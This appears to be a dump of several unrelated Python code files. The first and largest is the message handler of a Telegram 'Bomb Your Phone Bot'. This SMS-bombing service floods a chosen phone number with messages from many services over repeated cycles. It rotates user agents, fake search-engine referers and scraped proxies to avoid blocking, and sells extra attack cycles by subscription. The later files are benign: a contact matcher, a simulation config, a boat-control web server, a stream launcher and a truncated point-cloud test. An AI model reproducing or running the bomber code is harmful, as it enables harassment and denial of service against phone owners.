OperatingSystem.CHROMEOS.value,\r\n OperatingSystem.MAC_OS_X.value, OperatingSystem.MACOS.value,\r\n OperatingSystem.DARWIN.value, OperatingSystem.IOS.value,\r\n OperatingSystem.WINDOWS_PHONE.value]\r\n\r\n user_agent_rotator = UserAgent(software_names=software_names, operating_systems=operating_systems, limit=100)\r\n\r\n user_agent = user_agent_rotator.get_random_user_agent()\r\n\r\n return user_agent\r\n\r\n\r\ndef get_client(proxy_status: bool):\r\n proxy_string = random.choice(database.get_proxys()) if proxy_status else str()\r\n\r\n agent = get_user_agent()\r\n referer = random.choice(['https://yandex.ru/', 'https://www.google.com/',\r\n 'https://www.bing.com/', 'https://ya.ru/', 'https://mail.ru/',\r\n 'https://www.rambler.ru/', 'https://www.startpage.com/',\r\n 'https://www.qwant.com/?l=en', 'https://duckduckgo.com/',\r\n 'https://www.ecosia.org/', 'https://swisscows.com/',\r\n 'https://www.yahoo.com/', 'https://www.youtube.com/'])\r\n\r\n headers = {\r\n \"User-Agent\": agent,\r\n \"X-Requested-With\": \"XMLHttpRequest\",\r\n \"Referer\": referer,\r\n \"Accept-Encoding\": \"gzip, deflate\",\r\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,\"\r\n 
\"*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\r\n \"Connection\": \"keep-alive\",\r\n \"Accept-Language\": \"ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7\"\r\n }\r\n\r\n return aiohttp.ClientSession(\r\n headers=headers,\r\n connector=ProxyConnector.from_url(f'http://{proxy_string}')\r\n ) if proxy_status else aiohttp.ClientSession(\r\n headers=headers,\r\n connector=aiohttp.TCPConnector(limit=300, ssl=False)\r\n )\r\n\r\n\r\ndef generate_attack_message(formatted: str, status: str,\r\n connection: str, uid: str,\r\n cycles: int, country: str,\r\n region: str, operator: str,\r\n send_msg: int, cycles_completed: int,\r\n progressbar: str, attack_start_time: str,\r\n attack_stop_time: str):\r\n return f'Атака на номер {formatted}\\n\\n' \\\r\n f'Статус: {status}\\n' \\\r\n f'Подключение: {connection}\\n' \\\r\n f'UID: {uid}\\n' \\\r\n f'Количество циклов: {cycles}\\n\\n' \\\r\n f'Страна: {country}\\n' \\\r\n f'Регион: {region}\\n' \\\r\n f'Оператор: {operator}\\n\\n' \\\r\n f'Время начала атаки: {attack_start_time}\\n' \\\r\n f'Время окончания атаки: {attack_stop_time}\\n\\n' \\\r\n f'Количество отправленных СМС: {send_msg}\\n' \\\r\n f'Количество пройденных циклов: {cycles_completed}\\n\\n' \\\r\n f'{progressbar}'\r\n\r\n\r\ndef user_logger(attack_id: str, category: str, message: str, newattack: bool = False):\r\n if not newattack:\r\n for message in message.splitlines():\r\n with open(f'{__main__.PATH}/user_logs/{attack_id}.txt', 'a', encoding='utf8') as f:\r\n f.write(f'[{tools.get_formatted_time()}] [{category}] {message}\\n')\r\n else:\r\n with open(f'{__main__.PATH}/user_logs/{attack_id}.txt', 'w', encoding='utf8') as f:\r\n f.write(f'\\n ██████╗ ██████╗ ███╗ ███╗██████╗ ██╗ ██╗ ██████╗ ██╗ ██╗██████╗ \\n'\r\n f' ██╔══██╗██╔═══██╗████╗ ████║██╔══██╗ ╚██╗ ██╔╝██╔═══██╗██║ ██║██╔══██╗\\n'\r\n f' ██████╔╝██║ ██║██╔████╔██║██████╔╝ ╚████╔╝ ██║ ██║██║ ██║██████╔╝\\n'\r\n f' ██╔══██╗██║ ██║██║╚██╔╝██║██╔══██╗ ╚██╔╝ ██║ ██║██║ ██║██╔══██╗\\n'\r\n f' ██████╔╝╚██████╔╝██║ ╚═╝ ██║██████╔╝ ██║ ╚██████╔╝╚██████╔╝██║ ██║\\n'\r\n f' ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝\\n'\r\n f' ██████╗ ██╗ ██╗ ██████╗ ███╗ ██╗███████╗ ██████╗ ██████╗ ████████╗\\n'\r\n f' ██╔══██╗██║ ██║██╔═══██╗████╗ ██║██╔════╝ ██╔══██╗██╔═══██╗╚══██╔══╝\\n'\r\n f' ██████╔╝███████║██║ ██║██╔██╗ ██║█████╗ ██████╔╝██║ ██║ ██║ \\n'\r\n f' ██╔═══╝ ██╔══██║██║ ██║██║╚██╗██║██╔══╝ ██╔══██╗██║ ██║ ██║ \\n'\r\n f' ██║ ██║ ██║╚██████╔╝██║ ╚████║███████╗ ██████╔╝╚██████╔╝ ██║ \\n'\r\n f' ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ \\n\\n')\r\n\r\n\r\ndef get_attack_stop_time(meta: dict, timeout: int, pause: int, cycles: int):\r\n quantity_services = len(tools.load_services().items())\r\n _time = int((((timeout / 3) + pause) * quantity_services * cycles) / 180)\r\n stop_time_timestamp = int(meta['started']) + (_time * 51)\r\n formatted = datetime.datetime.fromtimestamp(stop_time_timestamp, pytz.timezone(\r\n 'Europe/Moscow'\r\n )).strftime(\"%H:%M:%S MSK\")\r\n return '* ' + formatted\r\n\r\n\r\nasync def attack(message: types.Message, meta: dict, from_user: int):\r\n global active_grabber\r\n global active_gays\r\n\r\n await log(meta)\r\n\r\n attack_id = meta['attack_id']\r\n code = meta['code']\r\n number = meta['number']\r\n formatted = meta['formatted']\r\n formatted_title = meta['formatted_title']\r\n cycles = meta['cycles']\r\n operator = meta['operator']\r\n country = meta['country']\r\n region = meta['region']\r\n attack_start_time = datetime.datetime.fromtimestamp(meta['started'], 
pytz.timezone(\r\n 'Europe/Moscow'\r\n )).strftime(\"%H:%M:%S MSK\")\r\n\r\n user_logger(attack_id, str(), str(), True)\r\n\r\n latest_edited = datetime.datetime.timestamp(datetime.datetime.now())\r\n\r\n referer = 'Proxoid.net'\r\n\r\n user_dump = database.get_user(from_user)\r\n proxy_status = random.choice([True, False]) if user_dump['settings']['proxy_status'] else False\r\n proxy_status_formatted = f'Прокси от {referer}' if proxy_status else 'Прямое'\r\n pause = user_dump['settings']['pause']\r\n timeout = user_dump['settings']['timeout']\r\n\r\n client = get_client(proxy_status)\r\n\r\n services_completed = 0\r\n sms_send = 0\r\n failed_sms = 0\r\n all_sms = len(tools.load_services().items()) * cycles\r\n\r\n kb = types.InlineKeyboardMarkup()\r\n button = types.InlineKeyboardButton(\r\n 'Остановить атаку ⛔',\r\n callback_data=f\"stop_attack {from_user}\"\r\n )\r\n kb.row(button)\r\n\r\n active_gays.append(from_user)\r\n\r\n if len(database.get_proxys()) < config.min_proxys and not active_grabber:\r\n active_grabber = True\r\n threading.Thread(target=proxy_grabber.grab, args=(logger, database,\r\n config.proxoid_token)\r\n ).start()\r\n\r\n # formatted = meta['formatted']\r\n # cycles = meta['cycles']\r\n # operator = meta['operator']\r\n # country = meta['country']\r\n # region = meta['region']\r\n\r\n user_logger(attack_id, 'Bomb Your Phone Bot', 'Initialization...\\n'\r\n f'ATTACK_ID: {attack_id}\\n'\r\n f'PHONE: {formatted}\\n'\r\n f'CYCLES: {cycles}\\n'\r\n f'TIMEOUT: {timeout}s\\n'\r\n f'PAUSE: {pause}s\\n'\r\n f'PHONE_COUNTRY: {country}\\n'\r\n f'PHONE_REGION: {region}\\n'\r\n f'PHONE_OPERATOR: {operator}')\r\n\r\n for cycle in range(1, cycles + 1):\r\n if from_user not in active_gays:\r\n user_logger(attack_id, 'Bomb Your Phone Bot', 'Attack stopped by user.')\r\n break\r\n\r\n user_logger(attack_id, 'Bomb Your Phone Bot', f'Cycle {cycle} started!')\r\n for module, service in tools.load_services().items():\r\n services_completed += 1\r\n\r\n if from_user not in active_gays:\r\n break\r\n\r\n if (datetime.datetime.timestamp(datetime.datetime.now()) - latest_edited) >= 15:\r\n try:\r\n latest_edited = datetime.datetime.timestamp(datetime.datetime.now())\r\n progressbar = tools.generate_progressbar(sms_send + failed_sms, all_sms)\r\n\r\n user_logger(attack_id, 'Bomb Your Phone Bot', 'Message updated.')\r\n await message.edit_text(generate_attack_message(formatted_title, 'В работе!',\r\n proxy_status_formatted, attack_id, cycles,\r\n country, region, operator, sms_send, cycle - 1,\r\n progressbar, attack_start_time,\r\n get_attack_stop_time(meta, timeout, pause,\r\n cycles - cycle - 1)),\r\n parse_mode='html', reply_markup=kb, disable_web_page_preview=True)\r\n except exceptions.MessageNotModified:\r\n pass\r\n try:\r\n await asyncio.sleep(pause)\r\n await getattr(module, service)(str(number), str(code), timeout, client).run()\r\n sms_send += 1\r\n user_logger(attack_id, service, f'Sent! ({sms_send}/{failed_sms})')\r\n except (ValueError, AttributeError, Exception):\r\n user_logger(attack_id, service, f'Not sent! 
Caused by {sys.exc_info()[0].__name__} '\r\n f'({sms_send}/{failed_sms})')\r\n failed_sms += 1\r\n try:\r\n await client.close()\r\n except (BaseException, Exception):\r\n pass\r\n proxy_status = random.choice([True, False]) if user_dump['settings']['proxy_status'] else False\r\n proxy_status_formatted = f'Прокси от {referer}' if proxy_status else 'Прямое'\r\n user_logger(attack_id, 'Bomb Your Phone Bot', 'Reconnecting...')\r\n client = get_client(proxy_status)\r\n continue\r\n\r\n try:\r\n await client.close()\r\n except (BaseException, Exception):\r\n pass\r\n\r\n progressbar = tools.generate_progressbar(sms_send + failed_sms, all_sms)\r\n\r\n kb = types.InlineKeyboardMarkup()\r\n button = types.InlineKeyboardButton(\r\n 'Отправить логи 💾',\r\n callback_data=f\"send_logs {attack_id}\"\r\n )\r\n kb.row(button)\r\n\r\n user_logger(attack_id, 'Bomb Your Phone Bot', 'Attack finished!')\r\n await message.edit_text(generate_attack_message(formatted_title, 'Завершено.', proxy_status_formatted,\r\n attack_id, cycles, country, region, operator,\r\n sms_send, cycles, progressbar, attack_start_time,\r\n tools.get_formatted_time()),\r\n parse_mode='html', reply_markup=kb,\r\n disable_web_page_preview=True)\r\n\r\n if from_user in active_gays:\r\n active_gays.remove(from_user)\r\n\r\n\r\n@dp.callback_query_handler(lambda e: e.data.startswith('send_logs'))\r\nasync def start_callback(callback_query: types.CallbackQuery):\r\n logger('Button', f'{tools.get_full_name(callback_query)} with id {callback_query.from_user.id} '\r\n f'press button {callback_query.data}')\r\n\r\n try:\r\n attack_id = callback_query.data.split(' ', maxsplit=1)[1]\r\n except (BaseException, Exception):\r\n return\r\n\r\n try:\r\n document = open(f'{__main__.PATH}/user_logs/{attack_id}.txt', 'rb')\r\n await callback_query.answer('Логи отправлены! 
Они придут в течении минуты.', True)\r\n return await bot.send_document(chat_id=callback_query.from_user.id,\r\n document=document)\r\n except (BaseException, Exception):\r\n await callback_query.answer('К сожалению, мы не нашли логи для этой атаки.', True)\r\n\r\n\r\n@dp.callback_query_handler(lambda e: e.data.startswith('unban_user'))\r\nasync def start_callback(callback_query: types.CallbackQuery):\r\n logger('Button', f'{tools.get_full_name(callback_query)} with id {callback_query.from_user.id} '\r\n f'press button {callback_query.data}')\r\n\r\n try:\r\n user = int(callback_query.data.split(' ', maxsplit=1)[1])\r\n except (BaseException, Exception):\r\n return\r\n\r\n dump = database.get_user(callback_query.from_user.id)\r\n\r\n if not database.get_user(user)['ban_status']:\r\n try:\r\n return await callback_query.answer(f'Уже лив инсайд!', True)\r\n except exceptions.InvalidQueryID:\r\n return\r\n\r\n text = (\"NEW UNBAN!\\n\\n\"\r\n f'Admin: {dump[\"full_name\"]}\\n'\r\n f'UnBanned: user\\n'\r\n f'UserID: {user}')\r\n text += f'\\nUsername: @{database.get_user(user)[\"user_name\"]}' if database.get_user(user)[\"user_name\"] != \"\" else \"\"\r\n\r\n try:\r\n await bot.send_message(config.attacks_logs, text, parse_mode='html')\r\n except exceptions.ChatNotFound:\r\n pass\r\n\r\n database.unban_user(user)\r\n\r\n try:\r\n misc.gays.remove(user)\r\n except (BaseException, Exception):\r\n pass\r\n\r\n text = f'Вы были разблокированы администратором {dump[\"full_name\"]}.'\r\n\r\n try:\r\n await bot.send_message(user, text, parse_mode='html')\r\n except (Exception, BaseException):\r\n pass\r\n\r\n try:\r\n return await callback_query.answer(f'Пользователь {user} разбанен!', True)\r\n except exceptions.InvalidQueryID:\r\n return\r\n\r\n\r\n@dp.callback_query_handler(lambda e: e.data.startswith('ban_user'))\r\nasync def start_callback(callback_query: types.CallbackQuery):\r\n logger('Button', f'{tools.get_full_name(callback_query)} with id {callback_query.from_user.id} '\r\n f'press button {callback_query.data}')\r\n\r\n try:\r\n user = int(callback_query.data.split(' ', maxsplit=1)[1])\r\n except (BaseException, Exception):\r\n return\r\n\r\n dump = database.get_user(callback_query.from_user.id)\r\n\r\n if database.get_user(user)['ban_status']:\r\n try:\r\n return await callback_query.answer(f'Уже дед инсайд!', True)\r\n except exceptions.InvalidQueryID:\r\n return\r\n\r\n text = (\"NEW BAN!\\n\\n\"\r\n f'Admin: {dump[\"full_name\"]}\\n'\r\n f'Banned: user\\n'\r\n f'UserID: {user}')\r\n text += f'\\nUsername: @{database.get_user(user)[\"user_name\"]}' if database.get_user(user)[\"user_name\"] != \"\" else \"\"\r\n kb = types.InlineKeyboardMarkup()\r\n button1 = types.InlineKeyboardButton(\r\n \"Разбанить\",\r\n callback_data=f\"unban_user {user}\"\r\n )\r\n button2 = types.InlineKeyboardButton(\r\n 'Профиль',\r\n callback_data=f\"get_profile {user}\"\r\n )\r\n button3 = types.InlineKeyboardButton(\r\n 'Профиль админа',\r\n callback_data=f\"get_profile {callback_query.from_user.id}\"\r\n )\r\n\r\n kb.row(button1, button2)\r\n kb.row(button3)\r\n\r\n try:\r\n await bot.send_message(config.attacks_logs, text, reply_markup=kb, parse_mode='html')\r\n except exceptions.ChatNotFound:\r\n pass\r\n\r\n database.ban_user(user)\r\n\r\n text = f'Вы были заблокированы администратором {dump[\"full_name\"]}. Для ' \\\r\n f'разблокировки, пожалуйста, ' \\\r\n f'обратитесь в тех. поддержку (@{config.support}). 
' \\\r\n f'Ваш персональный код - {user}'\r\n\r\n misc.gays.append(user)\r\n\r\n try:\r\n await bot.send_message(user, text, parse_mode='html')\r\n except (Exception, BaseException):\r\n pass\r\n\r\n try:\r\n return await callback_query.answer(f'Пользователь {user} забанен!', True)\r\n except exceptions.InvalidQueryID:\r\n return\r\n\r\n\r\n@dp.callback_query_handler(lambda e: e.data.startswith('get_profile'))\r\nasync def start_callback(callback_query: types.CallbackQuery):\r\n logger('Button', f'{tools.get_full_name(callback_query)} with id {callback_query.from_user.id} '\r\n f'press button {callback_query.data}')\r\n\r\n try:\r\n user = int(callback_query.data.split(' ', maxsplit=1)[1])\r\n except (BaseException, Exception):\r\n return\r\n\r\n text = start_message.generate_profile_text(user)\r\n\r\n await bot.send_message(callback_query.from_user.id, text, parse_mode='html')\r\n\r\n try:\r\n return await callback_query.answer(f'Профиль пользователя {user} отправлен!', True)\r\n except exceptions.InvalidQueryID:\r\n return\r\n\r\n\r\n@dp.callback_query_handler(lambda e: e.data.startswith('stop_attack'))\r\nasync def start_callback(callback_query: types.CallbackQuery):\r\n logger('Button', f'{tools.get_full_name(callback_query)} with id {callback_query.from_user.id} '\r\n f'press button {callback_query.data}')\r\n\r\n try:\r\n from_user = int(callback_query.data.split(' ', maxsplit=1)[1])\r\n except (BaseException, Exception):\r\n return\r\n\r\n try:\r\n active_gays.remove(from_user)\r\n except (Exception, BaseException):\r\n pass\r\n\r\n try:\r\n return await callback_query.answer('Атака остановлена! Сообщение обновится в течении минуты.', True)\r\n except exceptions.InvalidQueryID:\r\n return\r\n\r\n\r\n@dp.message_handler(content_types=['text'])\r\nasync def text_handler(message: types.Message):\r\n if not await thinker(message):\r\n return\r\n\r\n dump = get_user(message.from_user.id)\r\n checker = check_bomber(message, dump['settings']['default_cycles'])\r\n\r\n trial = not dump['sub_status']\r\n max_cycles = config.trial_cycles_count if trial else config.sub_cycles_count\r\n\r\n if not checker:\r\n text = 'Номер недействителен. ' \\\r\n 'Для получения информации об ' \\\r\n 'использовании бота, пожалуйста, ' \\\r\n 'используйте помощь.'\r\n\r\n reply_message = await message.reply(text, parse_mode='html')\r\n await asyncio.sleep(15)\r\n await reply_message.delete()\r\n return await message.delete()\r\n\r\n full_phone = tools.get_full_number(checker['code'], checker['number'])\r\n\r\n if trial and dump['trial_start_count'] < 1:\r\n text = 'К сожалению, ваш пробный период закончился. ' \\\r\n 'Для возобновления доступа к боту, пожалуйста, ' \\\r\n 'перейдите во вкладку \"Донат\" стартового сообщения.'\r\n\r\n reply_message = await message.reply(text, parse_mode='html')\r\n await asyncio.sleep(15)\r\n await reply_message.delete()\r\n return await message.delete()\r\n\r\n if checker['cycles'] > max_cycles:\r\n text = f'К сожалению, вы не можете использовать ' \\\r\n f'более {max_cycles} циклов. 
Для получения более ' \\\r\n f'подробной информации посетите вкладку \"Профиль\" ' \\\r\n f'стартового сообщения'\r\n\r\n reply_message = await message.reply(text, parse_mode='html')\r\n await asyncio.sleep(15)\r\n await reply_message.delete()\r\n return await message.delete()\r\n\r\n if full_phone in get_users()['attached_phone_numbers']:\r\n text = f'К сожалению, вы не можете запустить спам на ' \\\r\n f'данный номер телефона, так как его владелец имеет ' \\\r\n f'подписку в нашем боте'\r\n\r\n reply_message = await message.reply(text, parse_mode='html')\r\n await asyncio.sleep(15)\r\n await reply_message.delete()\r\n return await message.delete()\r\n\r\n if checker['code'] not in config.available_phone_codes:\r\n text = f'К сожалению, вы не можете запустить спам на ' \\\r\n f'данный номер телефона, так как операторы ' \\\r\n f'данной страны не обслуживаются'\r\n\r\n reply_message = await message.reply(text, parse_mode='html')\r\n await asyncio.sleep(15)\r\n await reply_message.delete()\r\n return await message.delete()\r\n\r\n if message.from_user.id in active_gays:\r\n text = f'К сожалению, вы не можете запустить спам ' \\\r\n f'на более одного номера одновременно. Пожалуйста, завершите ' \\\r\n f'предыдущую атаку.'\r\n\r\n reply_message = await message.reply(text, parse_mode='html')\r\n await asyncio.sleep(15)\r\n await reply_message.delete()\r\n return await message.delete()\r\n\r\n kb = types.InlineKeyboardMarkup()\r\n kb.row(types.InlineKeyboardButton(\r\n \"Wait... 🔙\",\r\n callback_data=\"passed\"\r\n ))\r\n\r\n reply_message = await message.reply(generate_attack_message(checker['formatted'], 'Ожидание...', 'Неизвестно',\r\n checker['attack_id'], checker['cycles'],\r\n checker['country'],\r\n checker['region'], checker['operator'], 0, 0,\r\n tools.generate_progressbar(0, 100),\r\n tools.get_formatted_time(), 'Неизвестно'),\r\n parse_mode='html', reply_markup=kb)\r\n\r\n checker['started'] = tools.get_time()\r\n\r\n if trial:\r\n database.minus_attack(message.from_user.id)\r\n\r\n await attack(reply_message, checker, message.from_user.id)\r\n","sub_path":"handlers/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":27621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"10151107","text":"#!/usr/bin/env python3\n\nimport logging\nimport unicodedata\nfrom collections import Counter\n\nfrom pylev3 import Levenshtein\n\n\ndef find_best_match(input_str, tab):\n normalized_input_str = _normalize(input_str)\n normalized_tab = [_normalize(item) for item in tab]\n result = Levenshtein.wfi([item[0: len(normalized_input_str)] for item in normalized_tab], normalized_input_str)\n\n grouped_list = Counter(result)\n distance_between_contacts = max(grouped_list.keys()) - min(grouped_list.keys())\n minimums_count = grouped_list[min(grouped_list.keys())]\n\n if (distance_between_contacts < 4) or (minimums_count > 3):\n raise Exception(\"No Contact named %s found\" % input_str)\n\n else:\n index = result.index(min(result))\n logging.info(\"Contact found %s\" % tab[index])\n return tab[index]\n\n\ndef _normalize(input_str):\n nkfd_form = unicodedata.normalize('NFKD', input_str)\n return (\"\".join([c for c in nkfd_form if not unicodedata.combining(c)])).lower()\n","sub_path":"contact_finder.py","file_name":"contact_finder.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"31435606","text":"import pema\nimport os\nimport straxen\nimport wfsim\n\nname = 'kr'\nbase_dir = '/dali/lgrandi/angevaare/wfsims/pema'\n\n# Fixed\ndata_name = f'pema_w{wfsim.__version__}_p{pema.__version__}'\nfig_dir = os.path.join(base_dir, f'figures_summary_{data_name}')\ndata_dir = os.path.join(base_dir, name, 'processed_data')\nraw_data_dir = os.path.join(base_dir, 'raw_data')\ninstructions_csv = f\"./inst_{data_name}.csv\"\n\n# You need this for setting up the dali-jobs\nenviron_init = '''eval \"$(/home/angevaare/software/Miniconda3/bin/conda shell.bash hook)\"\nconda activate strax\nexport PATH=/home/angevaare/software/Miniconda3/envs/strax/bin:$PATH'''\n\n# Output naming\ndefault_label = 'Normal clustering'\ncustom_label = 'Changed clustering'\n\n# Take a few arbitrary runs that allow to run jobs in parallel and get the \n# gains from CMT\nrun_list = list(f'{r:06}' for r in range(18750, 18750 + 15))\n\n# Just some id which allows CMT to load\nrun_id = run_list[0]\n\n# setting up instructions like this may take a while. You can set e.g. \ninstructions = dict(\n event_rate=5, # Don't make too large -> overlapping truth info\n chunk_size=5, # keep large -> less overhead but takes more RAM\n nchunk=100, # set to 100\n photons_low=1, # PE\n photons_high=100, # PE\n electrons_low=1, #\n electrons_high=100,\n tpc_radius=straxen.tpc_r,\n tpc_length=straxen.tpc_z, # TPC length approx\n drift_field=straxen.get_resource('fax_config_nt_low_field.json', fmt='json').get('drift_field'),\n timing='uniform', # Double S1 peaks uniform over time\n)\n\npema.inst_to_csv(\n instructions,\n instructions_csv,\n get_inst_from=pema.kr83_instructions)\n\nconfig_update = dict(\n detector='XENONnT',\n fax_file=os.path.abspath(instructions_csv),\n fax_config='fax_config_nt_low_field.json',\n)\n","sub_path":"notebooks/setup_kr.py","file_name":"setup_kr.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"46739778","text":"from fastapi import FastAPI\nfrom fastapi.responses import HTMLResponse, JSONResponse\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.encoders import jsonable_encoder\nfrom pydantic import BaseModel\nimport json\n\nfrom fake_boat import FakeBoat\n\nboat = FakeBoat()\napp = FastAPI()\napp.mount(\"/static\", StaticFiles(directory=\"static\"), name=\"static\")\n\n\nclass Item(BaseModel):\n speed: int\n angle: int\n led1: bool\n led2: bool\n\n\n@app.get(\"/\")\nasync def root():\n page = \"\"\n with open(\"index.html\") as f:\n page = f.read()\n return HTMLResponse(content=page)\n\n\n@app.post(\"/control\")\nasync def root(item: Item):\n data = item\n boat.set_led(data.led1, 0)\n boat.set_led(data.led2, 1)\n boat.set_speed(data.speed)\n boat.set_angle(data.angle)\n return {\"message\": \"Set: \"+str(boat)}\n\n\n@app.get(\"/telemetry\")\nasync def root():\n response = {\"speed\": boat.get_speed(),\n \"angle\": boat.get_angle(),\n \"led1\": boat.get_led(0),\n \"led2\": boat.get_led(1)}\n print(\"sending telemetry: \", response)\n #return JSONResponse(content=jsonable_encoder(response))\n return HTMLResponse(content=json.dumps(response))\n\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"569887487","text":"#!python2\n\nimport argparse\nimport logging\nfrom subprocess import Popen\nimport json\nfrom livestreamer import streams as livestreamer_stream\nfrom stream_lib import Streams\nfrom configparser import SafeConfigParser, ParsingError\nfrom shutil import copy\nimport webbrowser\nfrom movewindows import WindowsPosition\nimport time\n\n\n# Reading and loading configs\ntry:\n conf = SafeConfigParser()\n conf.read('E:\\code\\stream-check\\config.ini')\n STREAM_LIST_PATH = conf.get('stream_dict', 'path')\n STREAM_BACKUP_PATH = conf.get('stream_dict', 'backup')\n TEXT_PATH = conf.get('massiveadd', 'path')\n LOG_PATH = conf.get('log', 'path')\n FORMATTER = '%(asctime)-15s | %(levelname)-8s \\n %(message)-8s'\n logging.basicConfig(\n filename=LOG_PATH, level=logging.INFO, format=FORMATTER)\n logging.getLogger(\"requests\").setLevel(logging.WARNING)\n browser = webbrowser.get('windows-default')\nexcept ParsingError as e:\n print(\"Couldn't parse because {}\".format(e))\n\n\ndef open_dict():\n with open(STREAM_LIST_PATH) as f:\n logging.info('Opening dictionary')\n read_dict = json.load(f)\n stream_dict = Streams(read_dict)\n return stream_dict\n\n\ndef add_streams(url, game):\n stream_dict = open_dict()\n stream_dict.addStream(game.upper(), str(url))\n try:\n copy(STREAM_LIST_PATH, STREAM_BACKUP_PATH)\n logging.info('Backing up stream list at {}'.format(STREAM_BACKUP_PATH))\n except Exception as e:\n logging.error('Backup failed: {}'.format(e))\n with open(STREAM_LIST_PATH, 'w') as f:\n json.dump(stream_dict.streams, f)\n logging.info('Added url: {} \\n category: {}'.format(url, game))\n\n\ndef check_stream(url):\n try:\n if livestreamer_stream(url):\n return True\n else:\n return False\n except Exception as e:\n if args.verbose:\n logging.error('Couldnt open: {} ({})'.format(url, e))\n else:\n logging.error('Couldnt open: {}'.format(url))\n\n\ndef open_livestreamer(stream_urls, quality, verbose, chat, monitor):\n for stream_url in stream_urls:\n if check_stream(stream_url):\n if chat:\n webbrowser.open_new_tab(\n '{}/{}'.format(str(stream_url), 'chat'))\n\n #vod mode, makes possible to skip the time\n try:\n int(str(stream_url).split('/')[-1]) \n Popen(\n 'livestreamer {} {} -Q --player-passthrough=hls'.format(str(stream_url), quality), shell=verbose)\n #normal mode\n except ValueError: \n Popen(\n 'livestreamer {} {} -Q '.format(str(stream_url), quality), shell=verbose)\n\n logging.info('Opening: {} \\n Quality: {} \\n verbose: {}'.format(\n stream_url, quality, verbose))\n\n time.sleep(16)\n windows = WindowsPosition()\n windows.move(monitor)\n\n\ndef massive_add(text):\n with open(text, 'r') as f:\n lines = [line.strip() for line in f.readlines()]\n for line in lines:\n if line == line.upper():\n game = line\n else:\n url = line.split()\n add_streams(''.join(url[1::3]), game)\n\n\ndef main(game=None, quality='source', verbose=True, chat=False, monitor='monitor1'):\n streams = open_dict()\n if game == None:\n for stream in streams:\n open_livestreamer(stream, quality, verbose, chat, monitor)\n else:\n for game_category in game:\n open_livestreamer(\n streams[game_category.upper()], quality, verbose, chat, monitor)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Game streams to open')\n parser.add_argument(\n '--single', '-s', help='opens a single stream', action=\"store\")\n parser.add_argument( \n '--multi', '-m', help=\"open multiple streams\", nargs='*', action=\"store\")\n parser.add_argument(\n '--add', '-a', help=\"add stream 
to the list URL GAME\", nargs=2, action=\"store\")\n parser.add_argument(\n '-v', '--verbose', help=\"Makes cmd windows appear\", action=\"store_true\")\n parser.add_argument(\n '-c', '--chat', help=\"Opens twitch chat if available\", action=\"store_true\")\n parser.add_argument(\n '--quality', '-q', help='Chooses the quality to open streams, default = source', default='source')\n parser.add_argument(\n '--monitor', '-mn', help='Chooses the monitor to open, default = monitor1, n (see movewindows.py)', default='monitor1', action=\"store\")\n args = parser.parse_args()\n verbose = False if args.verbose else True\n chat = True if args.chat else False\n if args.single:\n open_livestreamer(\n [args.single], args.quality, verbose, chat, args.monitor)\n elif args.multi:\n main(args.multi, args.quality, verbose, chat, args.monitor)\n elif args.add:\n add_streams(args.add[0], args.add[1])\n else:\n main()\n","sub_path":"streamcheck-old.py","file_name":"streamcheck-old.py","file_ext":"py","file_size_in_byte":4974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"146283244","text":"from __future__ import print_function\nimport argparse\nimport os\nimport random\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nfrom torch.autograd import Variable\nfrom datasets import PartDataset\nfrom pointnet import PointNetDenseCls\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\nfrom show3d_balls import *\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--batchSize', type=int, default=1, help='input batch size')\nparser.add_argument('--workers', type=int, help='number of data loading workers', default=0)\nparser.add_argument('--nepoch', type=int, default=30, help='number of epochs to train for')\nparser.add_argument('--outf', type=str, default='seg', help='output folder')\nparser.add_argument('--model', type=str, default= './seg/seg_model_29_0.810.pth', help='model path')\n\n\nopt = parser.parse_args()\nprint (opt)\n\nopt.manualSeed = random.randint(1, 2500) # fix seed\nprint(\"Random Seed: \", opt.manualSeed)\nrandom.seed(opt.manualSeed)\ntorch.manual_seed(opt.manualSeed)\n\nnum_points = 2700\n\ntest_dataset = PartDataset(root = 'shapenetcore_partanno_segmentation_benchmark_v0', npoints=num_points, classification=False, class_choice=['tools'], train=False)\ntestdataloader = torch.utils.data.DataLoader(test_dataset, batch_size=opt.batchSize,\n shuffle=True, num_workers=int(opt.workers))\nprint(len(test_dataset))\n\nnum_classes = 10\nprint('classes', num_classes)\ntry:\n os.makedirs(opt.outf)\nexcept OSError:\n pass\n\nblue = lambda x:'\\033[94m' + x + '\\033[0m'\n\n\nclassifier = PointNetDenseCls(num_points=num_points, k=num_classes)\nclassifier.load_state_dict(torch.load(opt.model))\n# classifier.cuda()\nclassifier.eval()\n\nnum_test_batch = len(test_dataset)/opt.batchSize\n\ncmap = plt.cm.get_cmap(\"hsv\", 5)\ncmap = np.array([cmap(i) for i in range(10)])[:,:3]\n\ncorrect_percents = []\nfor i, data in enumerate(testdataloader, 0):\n points_np, target = data\n points, target = Variable(points_np), Variable(target)\n points = points.transpose(2, 1)\n # points, target = points.cuda(), target.cuda()\n\n pred, _ = classifier(points)\n pred = pred.view(-1, num_classes)\n target = target.view(-1,1)[:,0] - 1\n\n pred_choice = 